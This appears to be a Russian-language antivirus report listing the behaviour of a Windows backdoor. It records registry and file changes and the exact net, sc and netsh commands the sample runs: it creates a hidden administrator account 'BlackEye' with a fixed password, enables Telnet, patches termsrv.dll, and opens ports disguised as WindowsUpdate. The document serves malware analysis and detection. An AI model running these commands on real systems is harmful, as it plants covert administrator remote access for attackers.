Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- <SYSTEM32>\termsrv.dll файлом <SYSTEM32>\termsrv.dll
- <SYSTEM32>\dllcache\termsrv.dll файлом <SYSTEM32>\dllcache\termsrv.dll
- <SYSTEM32>\termsrv.dll
- <SYSTEM32>\dllcache\termsrv.dll
- '<SYSTEM32>\net1.exe' localgroup "Пользователи удалённого рабочего стола" BlackEye /add
- '<SYSTEM32>\net1.exe' localgroup "Remote Desktop Users" BlackEye /add
- '<SYSTEM32>\sc.exe' config tlntsvr start= auto
- '<SYSTEM32>\netsh.exe' firewall add portopening protocol=ALL port=9000 name=WindowsUpdateSheduler mode=ENABLE scope=ALL
- '<SYSTEM32>\netsh.exe' firewall add portopening protocol=ALL port=23 name=WindowsUpdate mode=ENABLE scope=ALL
- '<SYSTEM32>\reg.exe' import key.reg
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\temp\run.cmd" "
- '<SYSTEM32>\net1.exe' user BlackEye 123321 /add /expires:never /times:all
- '<SYSTEM32>\net1.exe' localgroup "%USERNAME%s" BlackEye /add
- '<SYSTEM32>\net1.exe' localgroup "Администраторы" BlackEye /add
- %WINDIR%\Temp\run.cmd
- %WINDIR%\Temp\key.reg
- %WINDIR%\Temp\termsrv.dll
- %WINDIR%\Temp\key.reg
- %WINDIR%\Temp\run.cmd
- %WINDIR%\Temp\termsrv.dll
- <SYSTEM32>\dllcache\termsrv.old
- <SYSTEM32>\termsrv.old
- <SYSTEM32>\termsrv.dll в <SYSTEM32>\termsrv.old
- <SYSTEM32>\dllcache\termsrv.dll в <SYSTEM32>\dllcache\termsrv.old
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'